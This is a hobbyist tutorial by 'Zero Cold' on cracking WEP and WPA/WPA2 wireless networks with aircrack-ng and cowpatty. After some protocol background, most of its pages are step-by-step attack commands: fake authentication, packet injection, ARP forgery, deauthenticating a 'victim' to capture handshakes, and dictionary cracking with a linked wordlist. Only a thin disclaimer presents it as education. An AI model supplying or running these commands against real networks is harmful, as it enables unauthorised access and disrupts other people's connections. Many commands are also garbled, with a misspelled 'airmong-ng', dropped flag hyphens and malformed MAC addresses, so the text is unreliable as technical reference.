wireless encrypted networks

8/7/2019 Wireless Encrypted Networks

1/28

Wireless Encrypted Networks

By Zero Cold


2/28

Index

About WEP................................................................................................................. 3 About WPA. 4 Tools used to crack Wi-Fi... 5 Things to know before cracking WPA/WEP... 6 Cracking WEP Wesside-ng. 7 Cracking WEP 0841 10 Cracking WEP Chop Chop.. 14 Cracking WPA with Airolib-ng & Cowpatty.. 20 Cracking WPA with A Dictionary ..25 Things to remember when training.. 28


3/28

WEP Encryption for Wireless Networks

Wired Equivalent Privacy (WEP) is a security protocol for wireless networks that encrypts transmitted data. It's

easy to configure. Without any security your data can be intercepted without difficulty.

However, WEP was an early attempt to secure wireless networks, and better security is now available such asDES, VPN, and WPA.

WEP has three settings: Off (no security), 64-bit (weak security), 128-bit (a bit better security). WEP is not

difficult to crack, and using it reduces performance slightly.

If you run a network with only the default security, where WEP is turned off, any of your neighbors can

immediately log on to your network and use your Internet connection.

For wireless devices to communicate, all of them must use the same WEP setting. (40-bit and 64-bit WEP en-

cryption is the same thing 40-bit devices can communicate with 64-bit devices.)

While there is no extra performance cost to encrypting the longer key, there is a cost to transmitting the extra

data over the network. 128-bit security is not much more difficult than 64-bit to crack, so if you are concerned

about performance, consider using 64-bit. If you're very concerned about security, use WPA, which replaces

WEP with a protocol that is given current technology impossible to crack. There's a good overview in.Fi Protected Access)-New in Security: WPA (Wiwhats

The WEP concept ofpassphrase is introduced so that you do not have to enter complicated strings for keys by

hand. The passphrase you enter is converted into complicated keys. Choose passphrases with the same care you

would important passwords.

With 128-bit encryption, you need to enter a passphrase to generate each key.

All four keys must be specified, because WEP switches between them to make your traffic more difficult to

break.

All devices within your LAN must use the same passphrases (i.e., the same keys).


4/28

WPA Encryption or Wireless Networks

Wi-Fi Protected Access (WPA and WPA2) is a certification program administered by the Wi-Fi Alliance to

indicate compliance with the security protocol created by the Wi-Fi Alliance to secure wireless computer

networks. This protocol was created in response to several serious weaknesses researchers had found in the

previous system, Wired Equivalent Privacy (WEP). However, researchers discovered a flaw in 2008 that reliedon older weaknesses to retrieve the keystream from short packets to use for re-injection and spoofing. The

protocol implements the majority of the IEEE 802.11i standard, and was intended as an intermediate measure to

take the place of WEP while 802.11i was prepared. Specifically, the Temporal Key Integrity Protocol (TKIP)was brought into WPA. TKIP could be implemented on pre-WPA wireless network interface cards that began

shipping as far back as 1999 through firmware upgrades. Because the changes required fewer modifications on

the client than on the wireless access point, most pre-2003 APs could not be upgraded to support WPA with

TKIP.

The later WPA2 certification mark indicates compliance with an advanced protocol that implements the full

standard. This advanced protocol will not work with some older network cards. Products that have successfully

completed testing by the Wi-Fi Alliance for compliance with the protocol can bear the WPA certification mark.

Pre-shared key mode (PSK, also known as Personal mode) is designed for home and small office networks that

don't require the complexity of an 802.1X authentication server. Each wireless network device encrypts thenetwork traffic using a 256 bit key. This key may be entered either as a string of 64 hexadecimal digits, or as a

passphrase of 8 to 63 printable ASCII characters. If ASCII characters are used, the 256 bit key is calculated

using the PBKDF2 hash function, using the passphrase as the key and the SSID as the salt.

Shared-key WPA is vulnerable to password cracking attacks if a weak passphrase is used. To protect against a

brute force attack, a truly random passphrase of 13 characters (selected from the set of 95 permitted characters)

is probably sufficient. Rainbow tables have been computed by the Church of WiFi for the top 1000 SSIDsfor a

million different WPA/WPA2 passphrases. To further protect against intrusion the network's SSID should notmatch any entry in the top 1000 SSIDs.

In August 2008 a post in the Nvidia-CUDA forums announced the possibility to enhance the performance of

brute force attacks against WPA-PSK by a factor of 30 and more. The time-consuming PBKDF2-computation is

taken from the CPU to a GPU which can compute many passwords and their corresponding Pre-shared keys inparallel. The expected time to successfully guess a common password by at least 50% shrinks to about 2-3 days

by that. Some consumer chip manufacturers have attempted to bypass weak passphrase choice by adding a

method of automatically generating and distributing strong keys through a software or hardware interface thatuses an external method of adding a new wireless adapter or appliance to a network. The Wi Fi Alliance has

standardized these methods and certifies compliance with these standards through a program called Wi-Fi

Protected Setup (formerly Simple Config).

A weakness was uncovered in November 2008 by researchers at two German technical universities (TU Dresden and TU

Darmstadt), Erik Tews and Martin Beck, which relied on a previously known flaw in WEP that could be exploited only

for the TKIP algorithm in WPA and WPA2. The flaw can only decrypt short packets with mostly known contents, such as

ARP messages, and 802.11e, which allows Quality of Service packet prioritization for voice calls and streaming media.

The flaw does not lead to key recovery, but only a keystream that encrypted a particular packet, and which can be reused

as many as seven times to inject arbitrary data of the same packet length to a wireless client. For example, this allows in-

jecting faked ARP packets which make the victim send packets to the open Internet.


5/28

Tools for Cracking WEP/WPA Networks

Aircrack-ng is a network software suite consisting of a detector, packet sniffer, WEP and WPA/WPA2-PSK cracker and

analysis tool for 802.11 wireless LANs. It works with any wireless card whose driver supports raw monitoring mode (for

a list, visit the website of the project) and can sniff 802.11a, 802.11b and 802.11g traffic. The program runs under Linux

and Windows; the Linux version has been ported to the Zaurus and Maemo platforms, and a proof-of-concept port has

been made to the iPhone.

In April 2007 a team at the Darmstadt University of Technology in Germany developed a new attack method based on a

paper released on the RC4 cypher by Adi Shamir. This new attack, named 'PTW', decreases the number of initialization

vectors or IVs needed to decrypt a WEP key and has been included in the aircrack-ng suite since the 0.9 release.

Aircrack-ng is a fork of the original Aircrack project.

Aircrack-ng Cracks WEP (Brute-force search) and WPA (Dictionary File) keys. Airdecap-ng Decrypts WEP or WPA encrypted capture files with known key. Airmon-ng Placing different cards in monitor mode. Aireplay-ng Packet injector (Linux, and Windows [with Commview drivers]). Airodump-ng Packet sniffer: Places air traffic into PCAP or IVS files and shows information about networks. Airtun-ng Virtual tunnel interface creator. Airolib-ng Stores and manages ESSID and password lists; Increases the KPS of WPA attacks Packetforge-ng Create encrypted packets for injection.Tools to merge and convert.

Airbase-ng Incorporates techniques for attacking client, as opposed to Access Points Airdecloak-ng Removes WEP cloaking from pcap files Airdriver-ng Tools for managing wireless drivers Airolib-ng Stores and manages ESSID and password lists and compute Pairwise Master Keys Airserv-ng Allows you to access the wireless card from other computers. Buddy-ng The helper server for easside-ng, run on a remote computer Easside-ng Tool for communicating to an access point, without the WEP key Tkiptun-ng WPA/TKIP attack Wesside-ng Automatic tool for recovering WEP key Cowpatty Is designed to audit the pre-shared key (PSK)


6/28

Things to know before cracking WEP/WPA Network

Basic service set identifier (BSSID)

A related field is the BSSID or Basic Service Set Identifier, which uniquely identifies each BSS (the SSID however, can

be used in multiple, possibly overlapping, BSSs). In an infrastructure BSS, the BSSID is the MAC address of the wirelessaccess point (WAP). In an IBSS, the BSSID is a locally administered MAC address generated from a 46-bit random num-

ber. The individual/group bit of the address is set to 0. The universal/local bit of the address is set to 1.

A BSSID with a value of all 1s is used to indicate the broadcast BSSID. A broadcast BSSID may only be used during

probe requests

Service Set identifier (SSID)

Service set identifier, or SSID, is a name that identifies a particular 802.11 wireless LAN. A client device receives broad-

cast messages from all access points within range advertising their SSIDs. The client device can then either manually or

automaticallybased on configurationselect the network with which to associate. The SSID can be up to 32 characterslong. As the SSID displays to users, it normally consists of human-readable characters. However, the standard does not

require this. The SSID is defined as a sequence of 132 octets each of which may take any value.

It is legitimate for multiple access points to share the same SSID if they provide access to the same network as part of an

extended service set. Some wireless access points support broadcasting multiple SSIDs, allowing the creation of Virtual

Access Points, partitioning a single physical access point into several virtual access points, each of which can have a dif-

ferent set of security and network settings. This is not yet part of the 802.11 standard.

MAC address (Mac)

In computer networking, a Media Access Control address (MAC address) is a unique identifier assigned to most network

adapters or network interface cards (NICs) by the manufacturer for identification, and used in the Media Access Control

protocol sub layer. If assigned by the manufacturer, a MAC address usually encodes the manufacturer's registered identi-

fication number. It may also be known as an Ethernet Hardware Address (EHA), hardware address, adapter address, or

physical address.

There are three numbering spaces, managed by the Institute of Electrical and Electronics Engineers (IEEE), which are in

common use for formulating a MAC address: MAC-48, EUI-48, and EUI-64. The IEEE claims trademarks on the names

"EUI-48" and "EUI-64", where "EUI" stands for Extended Unique Identifier.

Although intended to be a permanent and globally unique identification, it is possible to change the MAC address on most

of today's hardware, an action often referred to as MAC spoofing. Unlike IP address spoofing, where a sender spoofing

their address in a request tricks the other party into sending the response elsewhere, in MAC address spoofing (which

takes place only within a local area network), the response is received by the spoofing party.

A host cannot determine from the MAC address of another host whether that host is on the same OSI Layer 2 network

segment as the sending host, or on a network segment bridged to that network segment. In TCP/IP networks, the MAC

address of a subnet interface can be queried with the IP address using the Address Resolution Protocol (ARP) for Internet

Protocol Version 4 (IPv4) or the Neighbor Discovery Protocol (NDP) for IPv6. On broadcast networks, such as Ethernet,

the MAC address uniquely identifies each node and allows frames to be marked for specific hosts. It thus forms the basis

of most of the Link layer (OSI Layer 2) networking upon which upper layer protocols rely to produce complex, function-

ing networks.


7/28

Crack WEP with Wesside-ng Attack

Before cracking WEP with wesside-ng you will need are wireless interface name you can find this by opening a shell and

typing the following command:

airmon-ng. Your Device Name May Be Different

You should see a list of interfaces like below

Now you have your wireless interface name you will have to put the card into monitor mode by typing the followingcommands:

airmong-ng start wlan0. Your Device Name May Be Different


8/28

Note: the image above may look different if it says (monitor mode enabled on mon0) use mon0 as your device name. Now

you have your card in monitor mode we can start airodump to get the BSSID so you need to type airodump-ng & your

device name for example airodump-ng mon0 & it will look like below

airodump-ng mon0 Your Device Name May Be Different

Note: the encryption above is WPA but I changed it to WEP For Making this tutorial I changed the encryption type before

taking the image if you would like to crack WPA/WPA2 please go further down the page for that. Now you have the

BSSID from airodump you can start with wessid-ng next step is enter the commands in wesside-ng open a new shell or

press ctrl-c to kill airodump-ng & enter the next few commands:

wesside-ng h


9/28

Please Take note of these options they are always handy to crack a network fast & easy because this is a one line com-

mand tool the other ways of cracking networks the I will show you will be more than one line this is the most simple &

automated tool for cracking network that I know of at this time. The next step is to choose your options mine may be

different I have chosen to attack a network using a 64bit encryption for this tutorial so here we go.

Wesside-ng i mon0 v 00:23:4E: BC: 3A: AB k3

Your Device Name May Be Different

The reason Im am using k3 is because I get a packet collect error it something to do whit my wireless card if you get a

error try using k3 or k1 this is used for distance errors

Notice it capturing a type of encrypted key known as a IV once it captures enough IVs it can crack the keys also see it

capturing from a computer on the network the Mac address (00:1F:9F:AA:B0:4C) that the Mac address from the victims

machine who is using the internet. Once it has collected enough IVs it will automatically crack the key like below


10/28

Cracking WEP 0841 Attack

Before cracking WEP with the 0841 method you will need are wireless interface name you can find this by opening a

shell and typing

airmon-ng

Now you have your wireless interface name you will have to put the card into monitor mode by typing the followingcommands:

airmong-ng start wlan0 Your Device Name May Be Different

Now you have the device in monitor mode you need to scan with airodump-ng so you need to use the commands:

airodump-ng mon0 Your Device Name May Be Different


11/28

Like above you have airodump running you need to note down the bssid & the channel number for this attack. Once you

have that press ctrl-c to kill the connection & restart airodump-ng with the following commands

airodump-ng w wep c 1 bssid 00:23:4E:BC:3A:AB mon0 Your Device Name May Be Different

--bssid Victims Broadcast Address -c The channel number of the router -w The name of output file

Please keep airodump-ng running with the setting you have chosen for it to collect packets in the wep-01.cap file for

cracking later after we have entered a few more commands.

Now we have are card collecting packets & in monitor mode we can start by making a fake authentication with the victim

access point. You can do this by typing

aireplay-ng -1 3 a 00:23:4E: BC: 3A: AB h 00:1F:1F:14:4D: 6B mon0 Your Device Name May Be Different

-1 Fake Authentication

3 Amount of Time to Authenticate -a Victims Broadcast Address -h Your Mac Address

To find your Mac address I found the best way is to do the following commands

Macchanger mac 00:11:22:33:44:55:66 wlan0 Your Device Name May Be Different


12/28

As you can see below it has authenticated enough get a IV packet but it needs more so I have set it to 3 to get more pack-

ets if its running a 128 bit encryption it may need more so now you need to make sure it going to collect all this info into

a cap file we can do this by doing the next step

aireplay-ng -2 p 0841 c FF:FF:FF:FF:FF:FF b 00:23:4E:BC:3A:AB h 00:1F:1F:14:4D:6B mon0

-b Victims Broadcast Address -2 Interactive Frame Selections -p Set Frame Control word (Hex) -c Set Destination Mac Address -h Your Mac Address


13/28

As you can see its capturing packets in the cap file that you created with airodump now you are capturing the packets you

can start aircrack-ng by opening a new shell & typing the following command:

aircrack-ng wep*.cap

Wep*.cap The file we are collecting IV packets in to

The reason I have put a * there is due to if you have run airodump more than once it will make more cap files when using

the w command for file output & the files will output like this wep-01.cap,wep-02.cap & so on using the * in your com-

mand line it will use every pcap file you have in your root directory.

When Cracking with aircrack it tries to crack the key in multiple packet intervals for example you will need tocapture at least 5000 ivs before aircrack-ng may crack the key then it will go to 10000 ivs & so on so if it does

not crack the key strait away dont worry because it could take a little time due to the length or encryption of the

key


14/28

Cracking WEP Chop Chop Attack

Before cracking WEP with the Chop Chop Attack method you will need are wireless interface name you can find this by

opening a shell and typing

airmon-ng

.

Now you have your wireless interface name you will have to put the card into monitor mode by typing the following

commands:

airmong-ng start wlan0 Your Device Name May Be Different


15/28

You now need to run airodump-ng to get the bssid & the channel number of the victims router you can do this by typing

airodump-ng -w wep c 1 bssid 00:23:4E:BC:3A:AB mon0 Your Device Name May Be Different

-w Name of Output File -c Channel Number

Now you need to make a fake authentication with the victims router you can do this by typing the following commands:

aireplay-ng -1 0 a 00:23:4E: BC: 3A: AB h 00:1F:1F:14:4D: 6B mon0 Your Device Name May Be Different

Please Note that your bssid & Mac address will be different to mine & maybe your device name

-1 Fake authentication 0 Amount OF time TO authenticate 0 is also used as continuous loop -a Victims broadcast address -h Your Mac address


16/28

Now you have successfully authenticated you will need to collect a XOR packet using aireplay you can do this by typing

the following commands

aireplay-ng -4 b 00:23:4E:BC:3A:AB h 00:1F:1F:14:4D:6B mon0 Your Device Name May Be Different

-4 Chop Chop WEP Packet -b Victims Broadcast Address -h Your Mac Address


17/28

Once this has captured enough packets it will dump the output into a xor packet when it starts doing as the image is

showing below

Now we have are xor packets saving into an output file we can start on the next step you will need to create an arp-request

by using the following commands

Packetforge-ng -0 a 00:23:4E: BC: 3A: AB h 00:1F:1F:14:4D: 6B k 225.225.225.225 l 255.255.255.255.255 y

replay-dec-1126-112243.xor w arp-request

-0 Forge an ARP Packet -a Victims Broadcast Address -h You Mac Address -k Set Destination Ip Address -l Set Source Ip Address -y Read PRGA from This File (File Created With Aireplay-ng -5) -w Write Packet to Pcap File


18/28

The next step is to inject packets with the arp-request packet that you created with packetforge-ng to do this you can use

aireplay with the following commands:

aireplay-ng -2 r arp-request mon0 Your Device Name May Be Different

Info:

-2 Interactive Frame Selection (injection) -r Extract Packets From This File (Your File Created With Packetforge-ng)


19/28

All is left to do now is open a new shell type in

aircrack-ng -P 2 wep*.cap

-P 2 PTW Attack Wep*.cap The file we are collecting IV packets in to

The reason I have put a * there is due to if you have run airodump more than once it will make more cap files when using

the w command for file output & the files will output like this wep-01.cap,wep-02.cap & so on using the * in your com-

mand line it will use every pcap file you have in your root directory.

As you can see the above aircrack-ng has cracked the wireless key & decrypted it fully now all you need to do is take out

the colons & enter your key that you have crack & connect to the victims router

When Cracking with aircrack it tries to crack the key in multiple packet intervals for example you will need to

capture at least 5000 ivs before aircrack-ng may crack the key then it will go to 10000 ivs & so on so if it does

not crack the key strait away dont worry because it could take a little time due to the length or encryption of the

key


20/28

Airolib & CowpattywithCracking WPA

In this tutorial it will show you how to crack WPA & wpa2 networks with airolib & cowpatty.

Cowpatty is used to brute force a set pcap file that outputs from aircrack-ng

Before we use cowpatty you need to prepared by collecting a four way handshake the problem with cracking WPA & get-ting a four way handshake is you have to have a victim

To deauthenticate to collect a packet to start using cowpatty this can be done multiple ways

Before you start you will have to do what you have done in the following tutorials if you have followed then you need to

put your card into monitor mode this can be done

By typing

airmon-ng start wlan0 Your Device Name May Be Different

Now your card is in monitor mode you will need to use airodump-ng to find the victims bssid, Essid & channel number.

Once you have then press control-C & use the following commands:

airodump-ng -w WPA -c 1 --bssid 00:23:4E: BC: 3A: AB mon0 Your Device Name May Be Different

-w The name of output file -c The channel number --bssid The victims Broadcast Address


21/28

Next you will need to deauthenticate a victim on the network in other words boot he or she off the network for it to cap-

ture a four way handshake on reconnection. This can be done with the following commands

aireplay-ng -0 1 -a 00:23:4E: BC: 3A: AB -c 00:23:4D: 11:87:d5 mon0 Your Device Name May Be Different

Info:

-0 Deauthenticate victim

1 The amount of times to deauthenticate

-a The victims broadcast address -c The victims mac address of machine

As you can see in the above image I have successfully deauthenticated the victims machine on the network to capture a

four way handshake to know if you have the four way handshake you can see on the top right of the airodump window


22/28

Once you have your four way handshake you need to create a database for cowpatty to read you can do this using airolib-

ng with the following commands

airolib-ng pskdb import passwd /root/password.txt

Pskdb The name of database to be created Passwd Imports the password list /root/password.txt The location of password list

Here is the output I got when I imported the passwords

Now you have the database created you will need to import essids you will need to create a text file I have chosen to call

mine essid.txt but yours can be different remember if you rename you text file the name will be different in the command

line also you may want to place it into your root directory to save time for command line to import your essid.txt file place

the following commands into your shell:

airolib-ng pskdb --import essid essid.txt

You output should look like below

root@root~# airolib-ng pskdb import essid essid.txtReading file...

Writing...

Done.

root@root~#

The next step is to batch the file ready for output for usage in cowpatty you can do this with the following command:

Airolib-ng pskdb batch


23/28

This may take a little bit of time depending on the size of your wordlist for this guide I am using a small wordlist that con-

sists of approximately 1805 password but you will want a much larger one I have posted a 64million word one on the fo-

rums if you would like to download it go here http://www.megaupload.com/?d=7RN6ZB2E

Once you have everything batched up and ready to go lets just check everything went to plan with airolib-ng you can do

this with the following command

Airolib-ng pskdb --stat

Here is my output


24/28

Now we have all the required information in are database we can output it into a file that cowpatty can read this can be

done with the following command:

Airolib-ng pskdb export cowpatty BTHomeHub2-S5JW out

Please remember to change the essid to your essid that you have in your list & in your database and if all has gone to planit should look like below

root@root~# airolib-ng pskdb export cowpatty BTHomeHub2-S5JW out

Exporting...

Done.root@root~#

And now you should have a file called Output in your home folder so lets recap to see to check that everything

has been done correctly

We started by putting are card into monitor mode then run airodump-ng to collect are bssid,essid & channel

number then we closed airodump-ng & re-run it with are settings & creating a pcap file with airodump locked

on a set channel number & bssid then we deauthenticated a victim on the network to collect are four way hand-

shake which was stored in the pcap file then we created a cowpatty file using airolib-ng ready for cracking with

cowpatty & now is the time to do this with the following commands:

cowpatty -s BTHomeHub2-S5JW -d out -r WPA-01.cap

-s Victims Essid -d The output file that you created with airolib-ng -r The pcap file that you created with airodump-ng

Please not if you are getting errors like file not found put in the locations of the files for example: /root/Output


25/28

Cracking WPA with A Dictionary

In this tutorial it will show you how to crack WPA & wpa2 networks with aircrack & a dictionary list.

This is a little bit different from using airolib-ng & cowpatty its slower but you do not have to type is as many commands

and wait for the file to batch up it almost a strait forward brute force attack but like before you will need to get a four way

handshake. The problem with cracking WPA & getting a four way handshake is you have to have a victim

To deauthenticate to collect a packet to start using cowpatty this can be done multiple ways

Before you start you will have to do what you have done in the following tutorials if you have followed then you need toput your card into monitor mode this can be done

By typing

airmon-ng start wlan0 Your Device Name May Be Different

Now your card is in monitor mode you will need to use airodump-ng to find the victims bssid, Essid & channel number.Once you have then press control-C & use the following commands:

airodump-ng -w WPA -c 1 --bssid 00:23:4E: BC: 3A: AB mon0 Your Device Name May Be Different

-w The name of output file -c The channel number --bssid The victims Broadcast Address


26/28

Next you will need to deauthenticate a victim on the network in other words boot he or she off the network for it to cap-

ture a four way handshake on reconnection. This can be done with the following commands

aireplay-ng -0 1 -a 00:23:4E: BC: 3A: AB -c 00:23:4D: 11:87:d5 mon0 Your Device Name May Be Different

Info:

-0 Deauthenticate victim

1 The amount of times to deauthenticate

-a The victims broadcast address -c The victims mac address of machine


27/28

As you can see in the above image I have successfully deauthenticated the victims machine on the network to capture a

four way handshake to know if you have the four way handshake you can see on the top right of the airodump window

Now you have a four way handshake you can start cracking with aircrack-ng & you dictionary list if you need a dictionary

//www.megaupload.com/?d=7RN6ZB2E:httplist there is one posted on the forums here is the link

to use aircrack-ng & a dictionary is simple when you remeber the commands here is how to do it

aircrack-ng -w password.txt WPA-01.cap

-w Your dictionary file WPA-01.cap your capture file (The File Created With Airodump)

Here is my output


28/28

Things to remeber when training

I will not take any resposibility on what you do if you use the tutorials for molicuse use & you get busted its not my fualt i

have written this guide for education perposes & performed all attacks on my own local network & agianst my own router

remeber there are laws on cracking into networks & peoples private information

Also if you have any problems with these guides please contact me on the forums & i will try to help you sort them out i

have been cracking wireless keys for about 2 years now & trying to find news ways to attack them also these are only a

few ways of doing it

this is more of a introduction to cracking wireless internet & i will be brining some more guides out soon to show the sort

of damage or what a attacker can do once he has a foothold in your network or even a backdoor one of your computers on

the networks how he can attack every computer on the network from a remote location

thanks for reading hope you enjoyed & learned somthing out of this i enjoyed writing it & reperforming old ways that i

havent done in a while

Shouts to pentest & qubit for being such good members & staff on the forums

Peace Zero Cold

wireless encrypted networks

Documents